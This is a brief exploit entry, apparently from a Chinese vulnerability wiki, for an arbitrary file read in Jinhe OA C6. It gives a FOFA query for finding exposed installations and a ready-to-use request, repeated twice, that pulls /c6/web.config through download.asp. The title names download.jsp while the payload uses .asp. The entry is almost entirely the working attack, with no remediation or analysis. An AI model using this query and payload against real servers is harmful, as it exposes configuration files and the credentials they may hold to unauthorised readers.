# 金和OA C6 download.jsp 任意文件讀取漏洞/en
==Vulnerability Impact==
Jinhe OA
==FOFA==
app="Jinher-OA"
==Payload==
/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config
Read web.config
/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容